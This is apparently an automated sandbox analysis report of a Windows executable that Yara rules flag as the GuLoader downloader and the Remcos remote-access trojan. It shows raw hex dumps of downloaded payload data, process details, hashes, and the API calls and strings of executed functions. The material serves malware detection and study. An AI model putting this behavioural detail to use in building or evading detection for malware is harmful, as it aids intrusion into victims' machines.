2025-01-11 07:11:49 UTC	14994	IN	Data Raw: fa d4 2c ec 7a 15 0a e5 f1 f0 83 cc df 7a 87 51 de 6b f5 a0 4b 09 fe 1f 37 b1 98 ef d2 cc a9 e0 58 94 ed ca 83 c2 88 bb f3 fd ea 91 d6 99 4d 57 25 aa ea 1e 1b e4 ce 58 79 a1 28 84 28 d5 0e 87 49 2a 84 69 42 09 65 7f a3 9c 20 ec 74 e2 3f 69 77 fc 1f 41 79 20 0f 21 b3 d0 be 71 f8 ee a6 f3 7b 63 2e 60 b1 f7 2a ba d8 55 6a b0 28 32 d2 37 e3 eb 2d 05 ff 59 ca 46 f6 03 12 3d 10 bd 62 02 52 ee ef dc bc 95 b5 dd 2b 24 09 89 05 24 15 ad 07 bc 6b ae cc a7 10 d0 5a 80 69 4f 8d 63 61 73 bc 80 4a b5 4d b1 97 e2 90 c0 5d 80 87 7c 4c 4a cd 2a 22 4d a0 bb fa 7f 70 1e 89 34 3a d0 da 04 81 2b 9c 2c 3b 78 58 28 0f cf 79 fe ea fa 83 6e ed 20 51 4c 26 e9 eb 18 e9 6a ea 64 59 b0 89 94 6b fc 74 33 47 1a 90 64 79 d5 09 7f 64 ae fb af d5 1b dd fe 2d b6 b8 b9 1e cd 28 ee 55 af 2f Data Ascii: ,zzQkK7XMW%Xy((IiBe t?iwAy !q{c.`Uj(27-YF=bR+$$kZiOcasJM]\|LJ*"Mp4:+,;xX(yn QL&jdYkt3Gdyd-(U/
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: d5 25 70 bd ea 37 f6 f9 c1 5a c4 96 76 65 f3 fe c8 bf 1d 63 f1 13 88 89 75 c3 b0 96 62 5b 30 72 bb d8 b1 f6 a0 5f 08 cd ac 44 05 cb e9 ee b7 94 67 12 5e 64 33 10 eb 32 2a 60 d8 b4 91 be 8e a2 d9 0d ad a5 25 83 93 f6 2e c0 83 65 58 58 8e 9b f5 e9 a2 37 f4 e2 5a 6c 27 ff eb c4 19 61 d4 3f 43 4d c7 0a e0 88 d0 23 3c 1c a0 e6 b7 4c 8e 5c dd 3d db d6 1b fc a2 22 80 67 01 f6 54 44 9f 34 b9 63 7c d4 50 db 20 db 63 a1 bb 72 0a 0a ac 0a 58 f5 71 07 e7 d0 d8 5c cb 36 cc 1b 4c 13 8d 24 4d 1d 73 5f 4a 21 c5 f0 c6 7e 12 19 50 8f 00 36 7e 06 0e 13 57 8c 06 6e a3 a3 73 9d f6 25 41 37 48 bb 5f 7d d1 95 f2 c7 96 77 8b 6d 21 70 bb 89 67 b1 ab 30 4b 92 4f 88 57 0e 35 b6 3b 24 b8 f1 5b 32 24 d7 7b 33 bd f7 c1 7c 6b 63 e6 d3 16 ab d2 e6 0e 75 f8 9a bb e6 ec e0 46 29 89 14 04 Data Ascii: %p7Zvecub[0r_Dg^d32*`%.eXX7Zl'a?CM#<L\="gTD4c\|P crXq\6L$Ms_J!~P6~Wns%A7H_}wm!pg0KOW5;$[2${3\|kcuF)
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: f5 15 f2 e7 78 cb c1 9d 0c 28 9d 7b 13 bf e9 ff eb 27 b8 92 9f 12 74 b1 36 d0 c5 9f 13 bd c5 aa c6 03 f9 a7 c0 a7 b6 d1 34 cd 87 f0 d7 17 52 ed 22 be e4 43 4b 03 88 05 91 8d d0 18 bd a0 65 c6 18 4f a8 4a 7b 3d 64 d5 a5 33 e9 0c be 0d b6 05 cc 87 80 aa 98 3b 90 f7 5e a0 19 64 a1 7a 11 77 0d a0 b0 cc 7a 7f b1 e3 aa 8c c9 d4 69 42 c0 f3 ca 30 3c fc cd ee 88 86 cb 08 25 61 0b 1e 14 ce 82 17 87 02 ba 1c 8b 01 99 1d 65 f7 a8 09 6c 2a 21 e3 ed 7e f4 19 6a ac bb fb ad 12 43 bf 86 29 af 56 57 f2 5f 90 ca 7b 8d d8 5f 34 d0 43 32 7a 92 a1 50 78 99 fc 59 98 14 b5 85 d1 2d e9 05 d7 d5 96 15 dc 5c 8d e1 f8 84 99 7a 7c f0 01 b0 a7 80 a3 88 01 1f 91 59 81 b4 43 26 b8 e1 ce f3 7f d5 ae a6 05 4c 2e 15 2b f8 ae ff b5 21 a6 5a d9 1a 51 e6 d8 21 46 81 50 aa 23 4b 69 49 b4 1d Data Ascii: x({'t64R"CKeOJ{=d3;^dzwziB0<%ael*!~jC)VW_{_4C2zPxY-\z\|YC&L.+!ZQ!FP#KiI
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: 4d a2 bd 95 29 bb fa 5a 97 fb d0 40 04 02 24 f4 a6 b0 74 f9 df 1d 64 de 02 e6 b2 9d 92 d8 0f 05 1f e9 9b e0 e6 81 e6 7f 2a 67 f9 9e 87 6d f2 91 88 98 32 cb 0a 3e a3 f3 f7 75 0a 87 69 78 fe 1d 18 76 56 a6 06 d7 c9 e0 42 cb 32 14 4c ec 1a 9e 78 e2 bd 0a 6d ec d3 2f 32 04 53 6a 87 12 a5 1b af ef 60 f9 d7 a2 e0 fa 53 95 bc bb f0 c9 4b 44 c5 bc 57 4b f1 cb f3 48 b1 dc d7 80 6f e5 82 39 97 63 91 d0 9b ae 0d 3f b9 85 a1 86 46 ae 41 75 43 9a ee 4b 2f b9 3b 9d 7f 95 f8 8c da 66 d3 67 87 94 81 5f a3 3e 84 f5 12 f6 6e 94 07 7f 3c 8b 25 55 3d 2c ef 6b ab 65 fc 9b 31 6d ac 08 04 76 de 40 86 4f 66 8a 70 75 2b c5 7b 1b 60 72 9a 3b c9 f5 3a 60 aa b9 f8 a9 eb da 87 1d 52 2a 99 ca 55 14 ba 83 27 be ab e1 65 6f 0d 69 3f 06 f5 26 76 05 d2 a9 82 b4 31 4e d9 37 08 73 80 05 c7 Data Ascii: M)Z@$tdgm2>uixvVB2Lxm/2Sj`SKDWKHo9c?FAuCK/;fg_>n<%U=,ke1mv@Ofpu+{`r;:`RU'eoi?&v1N7s
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: d1 a5 43 e9 e7 83 eb aa 48 52 b0 88 1b b7 02 83 b5 c2 63 8a 71 d8 5a d9 80 1d 3b db 49 4f 00 da b8 d9 8f d3 30 91 e7 41 71 ed d2 70 40 40 35 14 03 66 28 0b 4a 1a ff a8 96 2f ad 46 99 44 1d 13 18 3d 99 28 44 3a 17 f1 ae f0 38 67 78 90 ca 90 4e 1b 81 ff 20 ff 78 25 c5 e8 36 b4 21 1d 73 5c c7 e1 67 bb f6 e8 22 8c 7c 84 68 0a 8c 46 b8 44 0c 02 01 bb 29 ef 79 02 da fc c6 47 42 8e b1 a7 6c 75 58 c1 28 3e 19 78 3f 1e d1 96 14 25 3c 26 c9 92 cb ee 1e 9c c0 7c a3 8c 5a 41 4a df 54 aa 74 8f e0 2c 7b 2a b6 30 84 17 0a 70 4e 83 0e aa 27 21 4e a0 d7 46 f6 27 1c fe f1 75 ba 59 09 b9 82 27 1e c2 dd f9 53 ba 26 22 ab 2d a9 4d ad 33 47 a2 f6 15 b0 08 e9 b8 be 0f 97 d6 32 1f 64 1c d8 70 1d 6b ed 29 18 86 ce 2d 31 5e b1 c5 ea 25 d6 41 90 b7 c2 94 fb c6 21 32 a2 f6 cc fe fa Data Ascii: CHRcqZ;IO0Aqp@@5f(J/FD=(D:8gxN x%6!s\g"\|hFD)yGBluX(>x?%<&\|ZAJTt,{*0pN'!NF'uY'S&"-M3G2dpk)-1^%A!2
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: 6a 9e 67 6b c1 e6 98 5c c9 b9 e7 e1 1a 8d 4d 63 95 dc 02 d4 5b 45 95 16 81 cd bb 60 7f 78 e7 6d 6a a8 b7 95 3a d5 7c e4 71 7d 41 7d 51 c7 11 30 bb 6b bc bd 1c 1e 32 6f 33 18 10 5e 92 ef da 0e 21 4e cb 80 82 bb 95 4f b9 08 57 aa 57 39 00 f9 9d cc 76 a2 3b 0e aa e8 a4 16 15 91 0c 31 8f 27 a6 e8 e0 b5 f3 25 8d 55 f1 1f 88 08 ee 0e 56 0b bf bf 01 a8 52 33 83 e7 88 9e 2a 01 af 12 99 db e7 63 f7 dc 97 2e e0 67 71 35 9f a9 88 19 0a 28 ea 21 e0 ea 86 a0 05 d4 f6 c0 32 51 1b 82 31 6e 87 56 e3 63 5d f9 94 5c 93 b5 80 81 99 47 47 a3 a9 b6 b7 e8 25 0a 53 e1 ce fd 55 25 d1 d0 3e e9 87 47 3c 3f fe c8 01 40 ff 8a 53 45 df 62 0b b3 aa f6 a6 55 08 78 04 15 37 92 25 c1 5a af 1b 32 ef 3f 15 40 36 d6 2f 3d 57 b4 ce 5e bf a3 48 ec b3 1e 25 ee 9e 88 23 e9 cd b1 32 30 7a de f6 Data Ascii: jgk\Mc[E`xmj:\|q}A}Q0k2o3^!NOWW9v;1'%UVR3*c.gq5(!2Q1nVc]\GG%SU%>G<?@SEbUx7%Z2?@6/=W^H%#20z
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: ca 86 dd 8b 23 18 4d 64 98 78 8e 80 d5 7a 91 c1 60 11 57 df ad f4 59 78 2e 59 47 98 87 1a 38 14 30 0c 5b 97 3b 18 3f 7a e0 62 ec 03 53 2c c1 16 fe 8e 1c c0 8b 50 0b c7 40 95 1b 26 1e 45 bc df 02 35 89 0f 32 82 48 2a 47 a3 62 f0 54 f7 ab 73 7b d8 ed 7a 22 86 ce a3 39 30 db 39 5b db 33 18 ec 70 13 1c e3 9d 68 f5 35 72 0c 54 5a cb b9 d1 08 28 23 67 36 3f ec 57 83 b1 db 06 23 9f f7 b3 f0 a3 20 4b 51 90 34 73 74 3f 4e 6e 3b a2 a5 87 44 78 f5 1f 7e d2 77 ca 61 6e bc 4e 68 a6 55 a2 56 a7 3a 57 d1 de a5 fb 39 01 ef 12 a9 bf af e4 00 0b 89 b4 01 6f a5 3a 17 83 5d 7f 20 91 a7 7f c8 ad cc 7a 47 f0 86 8a d5 bf 70 5a 42 7f 4f 39 58 46 3c 7e 53 f2 93 aa e8 97 25 49 28 04 79 a7 16 b2 e6 47 bc 3c 07 7c c1 dd 89 7d 70 b7 94 13 bd 48 10 c0 00 fe b6 c4 7b fa 0d 40 d2 66 19 Data Ascii: #Mdxz`WYx.YG80[;?zbS,P@&E52H*GbTs{z"909[3ph5rTZ(#g6?W# KQ4st?Nn;Dx~wanNhUV:W9o:] zGpZBO9XF<~S%I(yG<\|}pH{@f
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: 95 8f ec 8f 90 0d 52 ff 7f 3d ba 71 cd 5d 8a 72 7f 03 de cb 46 d2 38 82 88 ea 7a f2 cc fe 77 ea e5 f1 cf fc fd d9 f1 44 e4 11 44 1c e0 a8 be 50 3d df b9 98 36 ee ab 04 86 2f 42 61 3b e3 a1 0b 44 f2 67 ee 04 05 c3 a3 af cc 91 c2 a5 93 25 f8 c0 88 ed 71 21 66 41 ba 35 43 b0 fd 4b 6a bb 74 06 a0 3c bd d7 77 73 72 fc f0 05 81 41 22 f7 08 cd 57 55 28 8b 05 aa eb 81 31 56 6b 6d fd eb c6 38 21 aa 33 c9 04 e7 19 cf 5b 05 34 3b 5d d5 e8 69 da c2 61 17 a1 96 6f da 9f 24 f4 d8 4b 9d a4 e5 aa 9b e8 6d 6f c1 29 0d 49 3a 08 a5 b7 8a 42 2b f6 87 fd ff 44 b6 19 93 3e 78 87 c4 d5 7f 11 a7 ff c0 31 6d 5e 75 2c 5c 51 6b 71 06 b5 4c 34 2d b0 5e 4d 48 99 8e cc e1 55 f9 1a b7 f4 fd a9 e3 05 f4 4c ec 56 31 5b c6 85 d6 fd f3 26 63 9b fc 6c 24 b3 17 ee e8 3c ae 1e cf f1 72 e9 d4 Data Ascii: R=q]rF8zwDDP=6/Ba;Dg%q!fA5CKjt<wsrA"WU(1Vkm8!3[4;]iao$Kmo)I:B+D>x1m^u,\QkqL4-^MHULV1[&cl$<r
2025-01-11 07:11:49 UTC	16384	IN	Data Raw: ab 1b 79 97 8f 90 a2 99 17 78 d8 4d 4b 4f 50 ec 33 52 21 53 82 14 cb bc 73 4e 48 03 52 8a b2 14 23 33 cb 39 3b 40 68 b3 48 f8 62 d5 b6 87 fb 9c f4 4a 4e c1 d6 5f 7d 47 4f 44 08 f3 c0 44 2f 58 58 5b d0 54 65 d4 c3 3b 1f a5 32 67 aa eb 14 92 09 68 75 2d 4c 2f 66 f4 02 39 40 f6 a8 b2 ce 35 88 3b 11 e4 12 70 f0 af 34 75 dc 03 c7 e1 c4 16 2e 09 dc e6 66 86 f4 5e d6 67 da 61 52 4f 24 65 0b 47 3b aa 75 70 9a 39 bf 40 43 c9 61 99 c6 ab c6 65 d1 c8 4b 8c 76 ee 29 58 ab 39 f4 cb cd 39 4c 00 03 19 af a2 d0 ba 10 8d 83 18 78 84 05 f9 2b 7b 2b 4b d7 5d 59 45 99 a2 1c e9 9f 29 36 54 7d bd 8d 22 89 80 67 90 46 3b f7 42 d6 47 78 c2 5e 31 9e 57 f3 40 28 6e ee f7 c6 c9 97 ac 9a 92 b7 e9 cb 45 1f df 51 83 ec df 19 a8 95 78 48 9d 4c a8 9a 79 db d5 97 a0 b1 7d b2 fc 2a 20 ab Data Ascii: yxMKOP3R!SsNHR#39;@hHbJN_}GODD/XX[Te;2ghu-L/f9@5;p4u.f^gaRO$eG;up9@CaeKv)X99Lx+{+K]YE)6T}"gF;BGx^1W@(nEQxHLy}*

Target ID:	0
Start time:	02:11:17
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\ix8kxoBHDb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ix8kxoBHDb.exe"
Imagebase:	0x400000
File size:	514'430 bytes
MD5 hash:	D09DBFCAACC4E72DC2FF2D9119B7B9F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1444216544.0000000004C79000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:11:30
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\ix8kxoBHDb.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ix8kxoBHDb.exe"
Imagebase:	0x400000
File size:	514'430 bytes
MD5 hash:	D09DBFCAACC4E72DC2FF2D9119B7B9F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3784806023.0000000005897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.3784806023.00000000058C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	21%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.3%
Total number of Nodes:	1593
Total number of Limit Nodes:	36

Executed Functions

Function 004034A5 Relevance: 87.9, APIs: 32, Strings: 18, Instructions: 410
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 004034C8
GetVersion.KERNEL32 ref: 004034CE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
OleInitialize.OLE32(00000000), ref: 00403545
SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
CharNextW.USER32(00000000,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000020,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E

Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
ExitProcess.KERNEL32 ref: 0040383A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
CopyFileW.KERNEL32(C:\Users\user\Desktop\ix8kxoBHDb.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
OpenProcessToken.ADVAPI32(00000000), ref: 00403960
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
AdjustTokenPrivileges.ADVAPI32 ref: 00403998
ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
ExitProcess.KERNEL32 ref: 004039E0

Strings

SeShutdownPrivilege, xrefs: 0040396F
NSIS Error, xrefs: 00403567
C:\Users\user\AppData\Local\Temp\, xrefs: 004036DD, 004036E2, 004036F8, 00403704, 00403713, 00403720, 0040372C, 00403734, 0040384A, 0040385B, 00403866, 00403872, 0040387F, 0040388E, 0040393F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 004034BC
\Temp, xrefs: 004036FF
Error launching installer, xrefs: 004037D0
Low, xrefs: 0040371B
TMP, xrefs: 00403735
~nsu, xrefs: 00403845
1033, xrefs: 00403749
C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker, xrefs: 004037F6
C:\Users\user\Desktop, xrefs: 0040386C, 00403871, 0040389E
TEMP, xrefs: 0040372D
C:\Users\user\Desktop\ix8kxoBHDb.exe, xrefs: 004038F8
C:\Users\user\AppData\Roaming\brugser\brugo, xrefs: 004036CB, 004037EB, 00403895, 0040389F
.tmp, xrefs: 00403861
"C:\Users\user\Desktop\ix8kxoBHDb.exe", xrefs: 0040357C, 00403582, 00403776
UXTHEME, xrefs: 004034F5, 004034FA, 00403500

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker$C:\Users\user\Desktop$C:\Users\user\Desktop\ix8kxoBHDb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-4038786272
Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

Function 0040558F Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNELBASE(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNELBASE(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

(7B, xrefs: 0040587D
tH, xrefs: 004057E1
{, xrefs: 004057F5

Memory Dump Source

Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B$tH${
API String ID: 590372296-2594422933
Opcode ID: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: 25b2fdde4747a09c309382e68ae8746e18b360b2bf61ebef59f775d21e3b13bf
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 73B01B5F Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 73B0121B: GlobalAlloc.KERNEL32(00000040,?,73B0123B,?,73B012DF,00000019,73B011BE,-000000A0), ref: 73B01225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 73B01C6B
lstrcpyW.KERNEL32(00000008,?), ref: 73B01CB3
lstrcpyW.KERNEL32(00000808,?), ref: 73B01CBD
GlobalFree.KERNEL32(00000000), ref: 73B01CD0
GlobalFree.KERNEL32(?), ref: 73B01DB2
GlobalFree.KERNEL32(?), ref: 73B01DB7
GlobalFree.KERNEL32(?), ref: 73B01DBC
GlobalFree.KERNEL32(00000000), ref: 73B01FA6
lstrcpyW.KERNEL32(?,?), ref: 73B02140
GetModuleHandleW.KERNEL32(00000008), ref: 73B021B5
LoadLibraryW.KERNEL32(00000008), ref: 73B021C6
GetProcAddress.KERNEL32(?,?), ref: 73B02220
lstrlenW.KERNEL32(00000808), ref: 73B0223A

Memory Dump Source

Source File: 00000000.00000002.1483517567.0000000073B01000.00000020.00000001.01000000.00000005.sdmp, Offset: 73B00000, based on PE: true

Associated: 00000000.00000002.1483495722.0000000073B00000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483809646.0000000073B04000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.1483843847.0000000073B06000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_73b00000_ix8kxoBHDb.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
String ID:
API String ID: 245916457-0
Opcode ID: 5b5d10e4230cc0505f56368559c045ed01dba7c2b9f9bf8efc4be0b7b419014e
Instruction ID: 0d01f2f1da90978ce2c879f1062bfe9305781c6658dfc67bc23cbd96d6580092
Opcode Fuzzy Hash: 5b5d10e4230cc0505f56368559c045ed01dba7c2b9f9bf8efc4be0b7b419014e
Instruction Fuzzy Hash: DC228A79D0420ADFEB2A9FA4CA847EEBFF5FB84305F14453AD166A7180F77096848B50

Function 00405AFA Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,756F2EE0,00000000), ref: 00405B23
